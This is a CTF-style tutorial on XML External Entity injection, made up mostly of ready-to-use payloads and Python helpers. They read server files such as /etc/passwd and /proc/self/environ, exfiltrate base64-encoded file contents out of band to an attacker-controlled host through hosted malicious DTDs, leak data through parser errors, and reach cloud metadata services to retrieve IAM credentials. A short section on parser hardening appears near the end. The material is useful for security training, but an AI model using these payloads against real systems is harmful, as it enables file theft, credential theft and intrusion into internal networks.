XXE for CTF: XML External Entity Attacks

You found an XML endpoint. Here is the payload.

The form submits XML. The API accepts Content-Type: application/xml. The SOAP service, the SAML login, the SVG upload, the RSS importer, the office-document parser, all of them eat XML on the way in. The moment a server parses XML you control, you can usually make its parser open files for you. That is XXE (XML External Entity injection), and the canonical first move is to read /etc/passwd and see it reflected straight back in the response.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>

Send it where the application expects its XML. If any field of the response echoes the parsed value, you will see the contents of /etc/passwd sitting where &xxe; used to be. With curl:

curl -s https://target/api/parse \
  -H 'Content-Type: application/xml' \
  --data-binary @payload.xml
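If you would rather script delivery than retype curl commands, here is a minimal sketch using only Python's standard library. The endpoint is the same placeholder URL as the curl example, and build_file_read_payload and send_xml are illustrative helper names, not part of any tool. The sender also returns 4xx/5xx bodies, because error pages can carry the leak too.

```python
import urllib.error
import urllib.request


def build_file_read_payload(path: str, element: str = "data") -> str:
    """Return the classic reflected-XXE document that reads `path`."""
    # A SYSTEM literal cannot contain its own quote character.
    if '"' in path:
        raise ValueError("path must not contain a double quote")
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE foo [\n"
        f'  <!ENTITY xxe SYSTEM "file://{path}">\n'
        "]>\n"
        f"<{element}>&xxe;</{element}>\n"
    )


def send_xml(url: str, body: str, timeout: float = 10.0) -> str:
    """POST `body` as application/xml and return the response text."""
    req = urllib.request.Request(
        url,
        data=body.encode("utf-8"),
        headers={"Content-Type": "application/xml"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError as err:
        # 4xx/5xx pages can still carry the reflected value or a parser error.
        return err.read().decode("utf-8", errors="replace")


if __name__ == "__main__":
    # Placeholder endpoint from the curl example; replace with the real one.
    print(send_xml("https://target/api/parse", build_file_read_payload("/etc/passwd")))
```

Pass the element name the application actually echoes (for example productId) as the second argument.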

That is the whole trick in its simplest form. The rest of this guide is what to do when it is not that simple: when the response shows nothing, when the file you want has < characters that break the parse, when there is no XML field echoed but the parser can still make outbound requests, and when the only thing leaking is an error message. Each of those has a known payload. We will build up from the easy case to the blind case.

Note: XXE is cataloged as CWE-611 (Improper Restriction of XML External Entity Reference). If you have not done the file-read primitive before, the LFI for CTF guide covers the same read-a-file goal through a different door, and many of the target files overlap.

What are XML entities and DTDs, and why do they leak files?

XML has a built-in macro system. An entity is a named placeholder that the parser expands when it reads the document. You have already used the built-in ones: &lt; expands to a less-than sign, &amp; expands to an ampersand. You can also define your own. A Document Type Definition (DTD), declared in the <!DOCTYPE ...> block at the top of a document, is where custom entities live.

A plain internal entity is just text substitution:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY company "Initech">
]>
<note>&company; ships on Friday.</note>

The parser replaces &company; with Initech. Harmless. The danger is the keyword SYSTEM, which turns an entity into an external entity. Instead of inline text, the entity value becomes a URI that the parser dereferences:

<!ENTITY xxe SYSTEM "file:///etc/hostname">
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
<!ENTITY xxe SYSTEM "expect://id">       <!-- needs PHP expect:// wrapper -->
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">

When the document later references &xxe;, the parser fetches whatever the URI points at and splices the bytes into the document. A misconfigured XML library will happily resolve file://, http://, and on PHP the various stream wrappers. The vulnerability is not in the XML syntax. It is that the default parser settings on many platforms leave external entity resolution turned on.
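To see the internal/external difference without a target, here is a small sketch using Python's bundled ElementTree parser. It is chosen only because it ships with Python; a real target will usually run something else. With its default settings, ElementTree expands the internal entity but does not fetch the external one and instead raises an "undefined entity" parse error, which is a concrete case of XXE depending on parser configuration rather than on XML syntax.

```python
import xml.etree.ElementTree as ET

INTERNAL = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY company "Initech">
]>
<note>&company; ships on Friday.</note>"""

EXTERNAL = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<data>&xxe;</data>"""


def expand(doc: str) -> str:
    """Parse `doc` with the stdlib parser and return the root element's text."""
    return ET.fromstring(doc).text


def try_external(doc: str) -> str:
    """Return the parsed text, or the parser's error if it refuses the entity."""
    try:
        return expand(doc)
    except ET.ParseError as err:
        return f"refused: {err}"


if __name__ == "__main__":
    print(expand(INTERNAL))        # internal entity: plain text substitution
    print(try_external(EXTERNAL))  # external entity: never fetched here
```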

XXE is not a parsing bug. It is the parser doing exactly what the spec allows, against input the developer never imagined would define its own entities.

Two ingredients have to line up for the classic attack. First, you must be able to inject a <!DOCTYPE> with your own entity declaration (or the document already has a DTD you can extend). Second, the parser must have external entity resolution enabled. When both hold, you have an arbitrary file read at minimum and often a Server-Side Request Forgery primitive on top of it.

How do I read a file when the response is reflected?

The easiest target is one that takes XML, parses out a field, and renders that field back to you. A product-lookup endpoint, a contact form that echoes your name, an XML profile importer that shows a preview. Anywhere the parsed text reappears in the response, you have a reflected channel. Define the external entity, reference it inside the field that gets echoed:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<stockCheck>
  <productId>&xxe;</productId>
  <storeId>1</storeId>
</stockCheck>

If the app reports something like "Product root:x:0:0:root:/root:/bin/bash ...not found," you have won the reflected case. Common files worth pulling in a CTF, in rough order of payoff:

file:///etc/passwd                 # users, confirms read works
file:///etc/hostname               # container name hints
file:///proc/self/environ          # env vars, sometimes the flag or secrets
file:///proc/self/cmdline          # how the app was launched
file:///app/flag.txt               # the obvious one, try several paths
file:///var/www/html/config.php    # DB creds (but see the next callout)
file:///proc/self/cwd/flag.txt     # flag relative to the working directory
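When you are cycling through that list, a helper that recognizes a successful read saves squinting at every response. A sketch, assuming you supply a send hook (XML body in, response text out) and a build hook (file path in, payload out); both are hypothetical. The passwd regex is a heuristic, and the flag regex is a generic guess at the usual PREFIX{...} shape, so swap in your CTF's format.

```python
import re

# Candidate paths from the list above; extend them per challenge.
CANDIDATES = [
    "/etc/passwd",
    "/etc/hostname",
    "/proc/self/environ",
    "/proc/self/cmdline",
    "/app/flag.txt",
    "/var/www/html/config.php",
    "/proc/self/cwd/flag.txt",
]

# Heuristic: a passwd entry looks like name:x:UID:GID: somewhere in the page.
PASSWD_LINE = re.compile(r"\b[a-z_][a-z0-9_-]*:[^:\s]*:\d+:\d+:")
# Generic PREFIX{...} guess; replace with the flag format your CTF uses.
FLAG = re.compile(r"[A-Za-z0-9_]+\{[^}\s]+\}")


def classify(response_text: str) -> str:
    """Label a response as 'flag', 'passwd', or 'nothing'."""
    if FLAG.search(response_text):
        return "flag"
    if PASSWD_LINE.search(response_text):
        return "passwd"
    return "nothing"


def scan(send, build) -> dict:
    """Try every candidate path and classify each response.

    send:  hypothetical hook, XML body in, response text out.
    build: hypothetical hook, file path in, XXE payload out.
    """
    return {path: classify(send(build(path))) for path in CANDIDATES}
```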

Warning: Reflected file read breaks on two things. Multi-line files usually survive, but a file containing XML metacharacters, chiefly < and & (PHP source is the usual culprit), makes the parser choke when it tries to splice those bytes into the document. So does any file containing NUL bytes, such as /proc/self/environ and /proc/self/cmdline, because NUL is not a legal XML character. The fix is to read the file through a wrapper that encodes it first, or to switch to the base64-encoded out-of-band technique below. On PHP, base64-encode it at the source: php://filter/convert.base64-encode/resource=/var/www/html/config.php.

One more reflected trick: if a filter blocks the string file:// but the target runs PHP, php://filter lets you read and base64-encode source code without ever tripping the metacharacter problem. Decode the base64 you get back and you have the source. That overlaps heavily with the wrapper tricks in the LFI for CTF guide, which is worth reading alongside this one because the file-targeting instincts transfer directly.
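When php://filter output is reflected, it shows up as one long base64 run in the middle of the response. A sketch that finds and decodes such runs; the 16-character minimum is an arbitrary threshold meant to skip ordinary words, and long words can still produce false positives, so eyeball the results.

```python
import base64
import binascii
import re

# Runs of 16+ base64 characters; the threshold is an arbitrary heuristic
# meant to skip ordinary words (long words can still slip through).
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_reflected_base64(response_text: str) -> list:
    """Return the decoded bytes of every plausible base64 run in the response."""
    decoded = []
    for match in B64_RUN.finditer(response_text):
        try:
            decoded.append(base64.b64decode(match.group(0), validate=True))
        except binascii.Error:
            continue  # wrong length or padding: not a complete base64 blob
    return decoded
```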

What if the response shows nothing? Out-of-band exfiltration.

Most modern XXE is blind. The parser resolves your entity but the result never appears in the response, so reflection gives you nothing. You confirm the vulnerability and exfiltrate data by making the parser talk to a server you control. This is out-of-band (OOB) XXE, and it needs a collaborator: any host on the internet that logs the requests it receives. A throwaway VPS running a one-line web server, an nc -lvnp 80 listener, or a request-logging service all work.

First, just prove the parser can reach out. Point an external entity at your box and watch your log:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY callhome SYSTEM "http://YOUR-SERVER:8000/ping">
]>
<data>&callhome;</data>

# on your collaborator box, log every incoming request
python3 -m http.server 8000
# a hit on /ping confirms blind, OOB-capable XXE (404 is fine; the request is the signal)
10.0.0.5 - - [21/Jun/2026 12:01:44] "GET /ping HTTP/1.1" 404 -
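python3 -m http.server is enough to see the hit, but it answers 404 for /ping and only prints to the terminal. A sketch of a slightly friendlier collaborator using only the standard library: it answers every GET with an empty 200 and records the path in a HITS list you can inspect. The port, bind address, and empty-200 reply are assumptions you can change, and this handler serves no files, so keep the stock server (or extend do_GET) for hosting evil.dtd.

```python
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

HITS: list = []  # every request path seen, in arrival order


class CollaboratorHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        HITS.append(self.path)
        self.log_message("hit %s", self.path)  # stderr, http.server-style prefix
        # Empty 200 instead of a 404 page; the request itself is the signal.
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()


def start(host: str = "0.0.0.0", port: int = 8000) -> ThreadingHTTPServer:
    """Start the listener in a background thread and return the server."""
    server = ThreadingHTTPServer((host, port), CollaboratorHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


if __name__ == "__main__":
    srv = start()
    print(f"listening on {srv.server_address}")
    threading.Event().wait()  # block until Ctrl-C
```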

A hit means the parser does outbound HTTP. Now exfiltrate a file. You cannot splice the file contents into a URL from inside the document itself: a SYSTEM identifier is a literal, so the parser never expands an &name; reference written inside it, and the XML spec forbids parameter-entity references inside markup declarations in the internal subset. The standard workaround is an external DTD hosted on your server that uses parameter entities (covered in full further down). The malicious DTD reads the file, then builds a URL containing the file contents and forces a fetch to your box:

<!-- evil.dtd, hosted at http://YOUR-SERVER:8000/evil.dtd -->
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % wrap "<!ENTITY &#x25; send SYSTEM 'http://YOUR-SERVER:8000/leak?d=%file;'>">
%wrap;

The target document just pulls in that DTD and triggers the chain:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % dtd SYSTEM "http://YOUR-SERVER:8000/evil.dtd">
  %dtd;
  %send;
]>
<data>anything</data>

Read it in order: the target loads your external DTD; the DTD reads the target file into the parameter entity %file; %wrap defines a new entity %send whose URL embeds %file; invoking %send makes the parser request http://YOUR-SERVER:8000/leak?d=BASE64_OF_THE_FILE. The file lands in your access log as a query string. The base64 wrapper sidesteps the metacharacter problem entirely, which is why OOB is the reliable move for config files and source.
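Hand-editing evil.dtd and the target document for every file and every collaborator address gets error-prone. A sketch of a generator for exactly the pair above; collaborator and target_path are your inputs, build_oob_pair is a hypothetical helper name, and the php flag switches between the php://filter base64 read (PHP targets only) and a raw file:// read that is still subject to the metacharacter problem.

```python
def build_oob_pair(collaborator: str, target_path: str, php: bool = True) -> tuple:
    """Return (evil_dtd, target_document) for parameter-entity OOB exfiltration.

    collaborator: base URL you control, e.g. "http://YOUR-SERVER:8000".
    php:          wrap the read in php://filter base64 (PHP targets only).
    """
    if php:
        source = f"php://filter/convert.base64-encode/resource={target_path}"
    else:
        source = f"file://{target_path}"  # raw bytes; < or & may break the parse
    evil_dtd = (
        f'<!ENTITY % file SYSTEM "{source}">\n'
        # &#x25; delays the inner %, so %send is declared only when %wrap runs.
        f"<!ENTITY % wrap \"<!ENTITY &#x25; send SYSTEM '{collaborator}/leak?d=%file;'>\">\n"
        "%wrap;\n"
    )
    target_doc = (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE foo [\n"
        f'  <!ENTITY % dtd SYSTEM "{collaborator}/evil.dtd">\n'
        "  %dtd;\n"
        "  %send;\n"
        "]>\n"
        "<data>anything</data>\n"
    )
    return evil_dtd, target_doc
```

Write the first string to evil.dtd in the directory your collaborator serves, and send the second as the request body.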

Tip: Base64-encode the exfiltrated data at the source whenever possible. Newlines, ampersands, and reserved URL characters in the raw file will silently truncate or corrupt the fetched URL. On PHP targets, php://filter/convert.base64-encode/resource=... keeps the leak intact; other platforms usually have no equivalent wrapper, so raw OOB works best on short, single-line files. Decode the query string you receive with base64 -d.
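If you would rather decode in Python than copy the query string into base64 -d, here is a sketch that pulls the d parameter out of an access-log line like the ones http.server prints. The regex assumes the common "GET /path HTTP/1.1" request line; the helper also restores any + that query parsing turned into a space and re-pads stripped = characters.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# The request line inside a typical access-log entry: "GET /path HTTP/1.1"
REQUEST_LINE = re.compile(r'"GET (\S+) HTTP/[\d.]+"')


def decode_leak(log_line: str, param: str = "d") -> bytes:
    """Extract `param` from a logged GET request and base64-decode it."""
    match = REQUEST_LINE.search(log_line)
    if match is None:
        raise ValueError("no GET request line in this log entry")
    query = urlsplit(match.group(1)).query
    value = parse_qs(query)[param][0]
    # parse_qs decodes '+' as a space; base64 needs the '+' back.
    value = value.replace(" ", "+")
    # Restore any '=' padding that was stripped along the way.
    value += "=" * (-len(value) % 4)
    return base64.b64decode(value)
```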

For the workflow of standing up a collaborator and watching traffic land, the SSRF for CTF guide covers the exact same out-of-band confirmation loop, and Burp Suite for CTF walks through using Burp Collaborator if you would rather not run your own listener.

Can XXE reach internal services? XXE as an SSRF gun.

An external entity that resolves an http:// URL is, by definition, a server-side request. The XML parser is now your proxy into the target's internal network. That makes XXE one of the cleanest ways to land an SSRF, and the two vulnerability classes blur together here. Instead of pointing at your own box, point at something the server can reach but you cannot:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<data>&xxe;</data>

The high-value targets are the same ones any SSRF chases. Cloud instance metadata services hand out temporary credentials to anyone who can make the box ask for them:

http://169.254.169.254/latest/meta-data/                 # AWS IMDSv1
http://169.254.169.254/latest/meta-data/iam/security-credentials/  # AWS role name (append it for keys)
http://metadata.google.internal/computeMetadata/v1/      # GCP (needs a header)
http://127.0.0.1:8080/admin                              # internal-only admin panel
http://localhost:6379/                                   # poke at Redis, etc.

If the XXE is reflected, the security-credentials/ listing comes straight back in the response and names the instance role; point a second entity at that path plus the role name and the IMDSv1 temporary credentials come back the same way. If it is blind, route the response through the OOB DTD from the previous section to exfiltrate what the internal endpoint returned. Either way, a parser that does outbound HTTP is an SSRF you reach through XML rather than through a URL parameter.
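The security-credentials/ listing returns the role name rather than the keys; a second request to that path plus the role name returns the temporary credentials. A sketch of that two-step read through a reflected XXE, assuming a caller-supplied send hook (XML body in, reflected text out) and that the reflected text is exactly the entity's expansion. entity_payload and imds_v1_credentials are hypothetical helpers; the quote handling exists because a SYSTEM literal cannot contain its own delimiter.

```python
IMDS_CREDS = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"


def entity_payload(url: str) -> str:
    """Reflected XXE document whose entity fetches `url` server-side."""
    # A SYSTEM literal cannot contain its own delimiter, so pick the other quote.
    if '"' not in url:
        literal = f'"{url}"'
    elif "'" not in url:
        literal = f"'{url}'"
    else:
        raise ValueError("URL contains both quote characters")
    return (
        '<?xml version="1.0"?>\n'
        f"<!DOCTYPE foo [ <!ENTITY xxe SYSTEM {literal}> ]>\n"
        "<data>&xxe;</data>\n"
    )


def imds_v1_credentials(send) -> str:
    """Two-step IMDSv1 read: list the role name, then fetch that role's keys.

    send: hypothetical hook, XML body in, reflected text out.
    """
    role = send(entity_payload(IMDS_CREDS)).strip().splitlines()[0]
    return send(entity_payload(IMDS_CREDS + role))
```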

Note: GCP requires a request header (Metadata-Flavor: Google), and AWS IMDSv2 requires a session token fetched with a PUT request and sent back in a header. A bare external entity can only issue a plain GET with no custom headers. That is a real limitation of XXE-to-SSRF: you control the URL but not the method or the headers. When a target needs them, fall back to a dedicated SSRF primitive that can. The SSRF for CTF guide covers metadata-service attacks, header smuggling, and the redirect tricks that get around exactly this.

What if I only see error messages? Error-based leaks.

Sometimes there is no reflected field and the out-of-band leak never arrives (the exfiltration request is filtered, or the file contents mangle the URL), but the application is kind enough to show you parser error messages. You can weaponize the error text itself. The idea: make the parser use the file contents as part of a path or URI it cannot resolve, so the resulting error message quotes the file contents back at you.

This still uses an external DTD, so the target must be able to load it, but the final entity points at a deliberately invalid local path built from the file you read:

<!-- evil.dtd -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

When the parser tries to open file:///nonexistent/root:x:0:0:..., it fails and emits an error like java.io.FileNotFoundException: /nonexistent/root:x:0:0:root:/root.... The file contents ride along inside the exception string. You read the flag out of the error page. The same load-the-DTD-then-invoke pattern drives the target document:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % dtd SYSTEM "http://YOUR-SERVER:8000/evil.dtd">
  %dtd;
]>
<data>x</data>
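Picking the leak out of a long stack-trace page by eye is tedious. A sketch that extracts it, assuming the Java-style FileNotFoundException message and the /nonexistent/ prefix used in the DTD above; other parsers word their errors differently, so treat the regex as a starting point. It also trims the " (No such file or directory)" suffix Java appends to the path.

```python
import re
from typing import Optional

# Assumes the Java-style message and the /nonexistent/ prefix from the DTD above.
LEAK = re.compile(r"FileNotFoundException:\s*/nonexistent/(.+)")
# Java appends this suffix to the path in FileNotFoundException messages.
SUFFIX = re.compile(r"\s*\(No such file or directory\)\s*$")


def extract_error_leak(error_page: str) -> Optional[str]:
    """Return the file contents smuggled into the exception message, if any."""
    match = LEAK.search(error_page)
    if match is None:
        return None
    # '.' stops at the first newline, so only the first line of the file returns.
    return SUFFIX.sub("", match.group(1))
```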

Tip: Error-based XXE is single-line friendly but messy on multi-line files: the error often only quotes up to the first newline. For a one-line flag file it is perfect. For /etc/passwd you may only get the first line, which is still enough to prove the read. If the OOB leak from the blind section arrives intact, prefer it for anything longer.

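If the target cannot fetch an external DTD at all because there is zero outbound access, a fully local variant sometimes works: point a parameter entity at a DTD file that already exists on the target's filesystem, and redefine one of that DTD's parameter entities in your internal subset. Your redefinition wins because the first declaration of an entity is binding, and when the local DTD expands it, your nested declarations are processed inside an external DTD, where the internal-subset restriction does not apply. It depends on finding a suitable DTD on disk and is worth trying when the box is completely walled off.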
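The best-known zero-egress variant repurposes a DTD file already on the target: one parameter entity loads that local DTD, and the internal subset first redefines a parameter entity the local DTD both declares and references. Because the first declaration of an entity is binding, the local DTD expands your version, and the nested declarations then run inside an external DTD. A sketch of a payload generator; the local DTD path and entity name are assumptions you must fill in from reconnaissance, and local_dtd_payload is a hypothetical helper name.

```python
def local_dtd_payload(local_dtd: str, entity: str, target: str = "/etc/passwd") -> str:
    """Error-based XXE with no egress, by redefining a PE from a DTD on disk.

    local_dtd: path to a DTD that already exists on the target (assumption).
    entity:    a parameter entity that DTD declares and references (assumption).
    """
    # Inside the single-quoted literal, &#x25; becomes % when the value is
    # stored, and &#x26;#x25; becomes &#x25;, one level deeper, for the
    # nested declaration. &#x27; stands in for a quote the literal cannot hold.
    redefined = (
        f'<!ENTITY &#x25; file SYSTEM "file://{target}">\n'
        '<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM '
        "&#x27;file:///nonexistent/&#x25;file;&#x27;>\">\n"
        "&#x25;eval;\n"
        "&#x25;error;\n"
    )
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE foo [\n"
        f'<!ENTITY % local_dtd SYSTEM "file://{local_dtd}">\n'
        f"<!ENTITY % {entity} '\n{redefined}'>\n"
        "%local_dtd;\n"
        "]>\n"
        "<data>x</data>\n"
    )
```

Once the local DTD expands the redefined entity, the chain is the same as the error-based evil.dtd: read the file, build an invalid path from it, and read the contents out of the resulting error.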

What are parameter entities, and why do the advanced payloads need them?

You have seen % show up in every out-of-band payload. That is a parameter entity, and understanding it is what turns the advanced XXE payloads from copy-paste into something you can adapt on the fly.

XML has two entity namespaces. A general entity is declared with <!ENTITY name ...> and referenced in the document body with &name;. A parameter entity is declared with an extra percent sign, <!ENTITY % name ...>, and referenced inside the DTD itself with %name;. The distinction matters because of one well-formedness rule: in the internal DTD subset, a parameter-entity reference may appear only between markup declarations, never inside one. In an external DTD that restriction does not apply, so %file; can sit inside another entity's value, which is the loophole every blind and error-based payload rides on.

<!ENTITY      greet "hello">     <!-- general:   used as &greet; in the body -->
<!ENTITY %    file  SYSTEM "...">  <!-- parameter: used as %file; in the DTD -->

One more wrinkle you will hit constantly: nesting. To define an entity whose value contains another parameter-entity declaration, you write that declaration's percent sign as the XML character reference &#x25; so it is not treated as a reference too early. That is why the OOB DTD reads <!ENTITY &#x25; send SYSTEM '...'> instead of a literal %. The parser turns &#x25; into % when it stores %wrap's value, so %send is declared only when %wrap is expanded, after %file has already been filled in. Get the expansion order right and the rest of the chain falls into place.

General entities exfiltrate. Parameter entities are the plumbing that lets the file get into the entity in the first place. Almost every non-trivial XXE is a parameter-entity construction.

Key insight: The reason the malicious DTD lives on a remote server rather than inline is that well-formedness rule: the XML spec forbids parameter-entity references inside markup declarations in the internal subset, and conforming parsers enforce it. Hosting the dangerous declarations in an external DTD sidesteps the rule, which is exactly why blind XXE almost always involves a second file fetched from your collaborator box.
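You can watch that rule fire locally. The XML 1.0 well-formedness constraint "PEs in Internal Subset" is enforced by the expat parser behind Python's ElementTree, so a sketch like this should show an ordinary general entity parsing fine while a %p; reference inside an entity value in the internal subset is rejected. ElementTree does not load external DTDs, so it only demonstrates the forbidden side of the rule.

```python
import xml.etree.ElementTree as ET

# Ordinary general entity in the internal subset: well-formed.
PLAIN = """<!DOCTYPE foo [
  <!ENTITY greet "hello">
]>
<foo>&greet;</foo>"""

# Parameter-entity reference *inside* a declaration in the internal subset:
# this is what the "PEs in Internal Subset" constraint forbids.
INSIDE = """<!DOCTYPE foo [
  <!ENTITY % p "hello">
  <!ENTITY greet "%p;">
]>
<foo>&greet;</foo>"""


def parse_text(doc: str) -> str:
    """Return the root text, or the parser's complaint if it rejects the doc."""
    try:
        return ET.fromstring(doc).text
    except ET.ParseError as err:
        return f"rejected: {err}"


if __name__ == "__main__":
    print(parse_text(PLAIN))   # the general entity expands normally
    print(parse_text(INSIDE))  # expat refuses the %p; inside the declaration
```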

How is XXE actually fixed? (Know it to recognize it.)

Knowing the defense tells you instantly whether a target is exploitable, because every payload above depends on a default-on setting that one line of code disables. The authoritative guidance is short: turn off DTDs and external entities entirely.

The single most effective fix, recommended by the OWASP XXE Prevention Cheat Sheet, is to disallow DOCTYPE declarations completely. If the parser rejects any document that contains a <!DOCTYPE>, there is nowhere to declare an entity and the whole attack class evaporates:

// Java (the most common XXE target)
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

# Python lxml: do not resolve entities, load DTDs, or fetch network resources
from lxml import etree
parser = etree.XMLParser(resolve_entities=False, no_network=True, load_dtd=False)

// PHP libxml: disable external entity loading
libxml_set_external_entity_loader(null);
// (on libxml < 2.9, also: libxml_disable_entity_loader(true);)
// and never pass LIBXML_NOENT, which turns entity substitution on

// .NET
XmlReaderSettings s = new XmlReaderSettings();
s.DtdProcessing = DtdProcessing.Prohibit;

When you are attacking, this is your checklist in reverse. If a payload with a <!DOCTYPE> comes back with an error like "DOCTYPE is disallowed," the easy door is shut. If external entities resolve but nothing reflects and the leak never reaches your collaborator, look for visible parser errors: that is error-based territory. If everything resolves and reflects, you have the full menu. The PortSwigger Web Security Academy XXE topic has free labs for each variant if you want a sandbox to drill on.

Warning: Do not stop at /etc/passwd when you report or exploit this for real. XXE that reaches cloud metadata or internal services is frequently a full account takeover, not just a file read. Treat any confirmed external-entity resolution as a pivot point, not an endpoint. The real-world web bug patterns post shows how file-read primitives chain into bigger compromises.

Quick reference

Triage order on any XML endpoint

Send the reflected file:///etc/passwd payload. If it echoes, you are done.
No echo? Send the http://YOUR-SERVER/ping callback. A log hit means blind, OOB-capable.
OOB confirmed? Host evil.dtd and exfiltrate base64 to your access log.
OOB leak blocked but errors show? Use the error-based DTD to leak the file inside the exception (a local DTD if even the DTD fetch fails).
Point an external entity at 169.254.169.254 for cloud creds and internal services.
DOCTYPE is disallowed? The parser is hardened. Move on.
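The triage order above, encoded as a small decision function. It is a sketch: the observation flags are whatever you record by hand, the Observations class is a hypothetical helper, and it checks a rejected DOCTYPE first because that rules out every other step.

```python
from dataclasses import dataclass


@dataclass
class Observations:
    """What you have seen so far against one XML endpoint (self-reported)."""
    doctype_rejected: bool = False  # e.g. "DOCTYPE is disallowed"
    file_reflected: bool = False    # &xxe; came back with file contents
    callback_hit: bool = False      # your collaborator logged a request
    errors_visible: bool = False    # parser errors reach the response


def next_step(obs: Observations) -> str:
    """Map observations to the next move, following the triage order above."""
    if obs.doctype_rejected:
        return "hardened: move on"
    if obs.file_reflected:
        return "reflected: read files, then aim entities at 169.254.169.254"
    if obs.callback_hit:
        return "blind with egress: host evil.dtd and exfiltrate base64"
    if obs.errors_visible:
        return "errors only: error-based DTD (local DTD if it cannot fetch yours)"
    return "nothing yet: send the reflected payload and the callback probe"
```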

Payload cheat sheet

# 1. Classic reflected file read
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<data>&xxe;</data>
# 2. Blind callback (confirm OOB)
<!DOCTYPE foo [ <!ENTITY x SYSTEM "http://ME:8000/p"> ]>
<data>&x;</data>
# 3. OOB exfil: target document
<!DOCTYPE foo [ <!ENTITY % dtd SYSTEM "http://ME:8000/evil.dtd"> %dtd; %send; ]>
<data>x</data>
# 3b. evil.dtd (parameter-entity exfil)
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % wrap "<!ENTITY &#x25; send SYSTEM 'http://ME:8000/l?d=%file;'>">
%wrap;
# 4. Error-based: evil.dtd
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; err SYSTEM 'file:///x/%file;'>">
%eval; %err;
# 5. XXE to SSRF / cloud metadata
<!DOCTYPE foo [ <!ENTITY x SYSTEM "http://169.254.169.254/latest/meta-data/"> ]>
<data>&x;</data>
# curl delivery
curl -s https://target/api -H 'Content-Type: application/xml' --data-binary @p.xml

If a server parses XML you can touch, assume it will open files for you until it proves otherwise, then make the parser do the reading.

picoCTF's dedicated XXE challenge is SOAP (2023), a SOAP endpoint that parses your XML body and reflects the result, so the classic file:///etc/passwd payload above reads the flag directly.

For the adjacent web primitives that XXE chains into, keep the SSRF, LFI, and command injection guides open in adjacent tabs. A file-read on a config file plus one of those is how a single XXE becomes a flag.